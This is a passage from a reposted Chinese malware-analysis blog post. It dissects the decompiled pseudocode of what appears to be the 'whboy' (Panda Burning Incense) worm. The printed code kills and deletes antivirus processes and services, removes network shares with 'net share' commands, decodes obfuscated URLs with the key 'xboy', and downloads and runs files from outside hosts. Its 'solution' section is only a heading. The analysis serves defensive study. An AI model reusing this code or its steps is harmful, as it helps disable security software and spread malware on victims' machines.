v6 = j_MapVirtualKeyA('\x11', 0);
j_keybd_event(0x11u, v6, 0, 0);
v7 = j_MapVirtualKeyA('\x12', 0);
j_keybd_event(0x12u, v7, 0, 0);
v8 = j_MapVirtualKeyA('D', 0);
j_keybd_event(0x44u, v8, 0, 0);
v9 = j_MapVirtualKeyA('D', 0);
j_keybd_event(0x44u, v9, 2u, 0);
v10 = j_MapVirtualKeyA('\x11', 0);
j_keybd_event(0x11u, v10, 2u, 0);
v11 = j_MapVirtualKeyA('\x12', 0);
j_keybd_event(0x12u, v11, 2u, 0);
if ( j_FindWindowA(0, "IceSword") )
{
v12 = j_MapVirtualKeyA(0xDu, 0);
j_keybd_event(0xDu, v12, 0, 0);
v13 = j_MapVirtualKeyA(0xDu, 0);
j_keybd_event(0xDu, v13, 2u, 0);
}
}
}
while ( v0 );
sub_405FC4((int)"Mcshield.exe");
sub_405FC4((int)"VsTskMgr.exe");
sub_405FC4((int)"naPrdMgr.exe");
sub_405FC4((int)"UpdaterUI.exe");
sub_405FC4((int)"TBMon.exe");
sub_405FC4((int)"scan32.exe");
sub_405FC4((int)"Ravmond.exe");
sub_405FC4((int)"CCenter.exe");
sub_405FC4((int)"RavTask.exe");
sub_405FC4((int)"Rav.exe");
sub_405FC4((int)"Ravmon.exe");
sub_405FC4((int)"RavmonD.exe");
sub_405FC4((int)"RavStub.exe");
sub_405FC4((int)"KVXP.kxp");
sub_405FC4((int)"KvMonXP.kxp");
sub_405FC4((int)"KVCenter.kxp");
sub_405FC4((int)"KVSrvXP.exe");
sub_405FC4((int)"KRegEx.exe");
sub_405FC4((int)"UIHost.exe");
sub_405FC4((int)"TrojDie.kxp");
sub_405FC4((int)"FrogAgent.exe");
sub_405FC4((int)"KVXP.kxp");
sub_405FC4((int)"KvMonXP.kxp");
sub_405FC4((int)"KVCenter.kxp");
sub_405FC4((int)"KVSrvXP.exe");
sub_405FC4((int)"KRegEx.exe");
sub_405FC4((int)"UIHost.exe");
sub_405FC4((int)"TrojDie.kxp");
sub_405FC4((int)"FrogAgent.exe");
sub_405FC4((int)"Logo1_.exe");
sub_405FC4((int)"Logo_1.exe");
sub_405FC4((int)"Rundl132.exe");
sub_405FC4((int)"regedit.exe");
sub_405FC4((int)"msconfig.exe");
sub_405FC4((int)"taskmgr.exe");
return;
}
(4.2) sub_40C9B0
key:xboy
encryptedCode:
`uup2..wv/ak97.ko.6>.tp&uyt
decryptedCode:
http://www.ac86.cn/66/up.txt
int __usercall sub_40C9B0@<eax>(void *this@<ecx>, int a2@<ebx>, int a3@<edi>, int a4@<esi>)
{
decryptedFun_0(buff,encryptedCode, key);
ConnecttoWeb(v4, (volatile signed __int32 *)&v52);
LStrCmp((int)v52, (int)"QQ");
if ( !v5 )
{
while ( v52 )
{
if ( (signed int)__linkproc__ LStrPos("\r\n", v52) <= 0 )
{
LStrLAsg(v6, v52);
GetDir(&v44);
sub_40C420(v42, (volatile signed __int32 *)&v43);
LStrCat(v20, v43);
j_URLDownloadToFileA(0, v19, v23, v24, v25);
GetDir(&v41);
j_WinExec(v29, v30);
}
else{/*...*/}
}
}
return System::__linkproc__ LStrArrayClr(v31);
}
(4.3) 创建了两线程 sub_40C9B0这个和4.2一样; sub_40CDEC是新的
关闭 本地文件共享
int __usercall sub_40CDEC@<eax>(int a1@<ebx>)
{
v2 = GetpascalStrLenth(v15);/*获得Disk数量*/
while ( v2 )
{
LStrCatN( 3, buff , "$ /del /y", diskName, "cmd.exe /c net share ");
j_WinExec(buff, 0);
--v2;
}
j_WinExec("cmd.exe /c net share admin$ /del /y", 0);
return;
}
(4.4) sub_406E44 关闭安全软件服务
int __stdcall sub_406E44()
{
ExamineService((int)"Schedule");
ExamineService((int)"sharedaccess");
ExamineService((int)"RsCCenter");
ExamineService((int)"RsRavMon");
DeleteService("RsCCenter");
DeleteService("RsRavMon");
Certhelper::FindCertWithSerialNumber(v0, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\RavTask");
ExamineService((int)"KVWSC");
ExamineService((int)"KVSrvXP");
DeleteService("KVWSC");
DeleteService("KVSrvXP");
Certhelper::FindCertWithSerialNumber(v1, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\KvMonXP");
ExamineService((int)"kavsvc");
ExamineService((int)&dword_407140);
DeleteService((const CHAR *)&dword_407144);
DeleteService("kavsvc");
Certhelper::FindCertWithSerialNumber(v2, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\kav");
Certhelper::FindCertWithSerialNumber(v3, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\KAVPersonal50");
ExamineService((int)"McAfeeFramework");
ExamineService((int)"McShield");
ExamineService((int)"McTaskManager");
DeleteService("McAfeeFramework");
DeleteService("McShield");
DeleteService("McTaskManager");
Certhelper::FindCertWithSerialNumber(v4, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\McAfeeUpdaterUI");
Certhelper::FindCertWithSerialNumber(
v5,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Network Associates Error Reporting Service");
Certhelper::FindCertWithSerialNumber(v6, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ShStatEXE");
DeleteService("navapsvc");
DeleteService("wscsvc");
DeleteService("KPfwSvc");
DeleteService("SNDSrvc");
DeleteService("ccProxy");
DeleteService("ccEvtMgr");
DeleteService("ccSetMgr");
DeleteService("SPBBCSvc");
DeleteService("Symantec Core LC");
DeleteService("NPFMntor");
DeleteService("MskService");
DeleteService("FireSvc");
Certhelper::FindCertWithSerialNumber(v7, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\YLive.exe");
return Certhelper::FindCertWithSerialNumber(v8, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\yassistse");
}
(4.5) sub_40CC4C
用不同网址对qq进行攻击
`uup2..wv/tgl/cgl `uup2..wv/1>2/cgl `uup2..wv/sgit.knl
http://www.tom.com http://www.163.com http://www.sohu.com.
`uup2..wv/yiino&bnm `uup2..wv/ggnflm/boe
http://www.yahoo.com http://www.google.com
(4.6) sub_40C728 下载更新自身
`uup2..uxe`tm/vhjnx.fdu/nsm&uyt
http://update.whboy.net/worm.txt
3.解决方案
手工查杀步骤或是工具查杀步骤
本文转载自: https://blog.csdn.net/weixin_46566083/article/details/127036083
版权归原作者 在奋斗的大道上 所有, 如有侵权,请联系我们删除。
版权归原作者 在奋斗的大道上 所有, 如有侵权,请联系我们删除。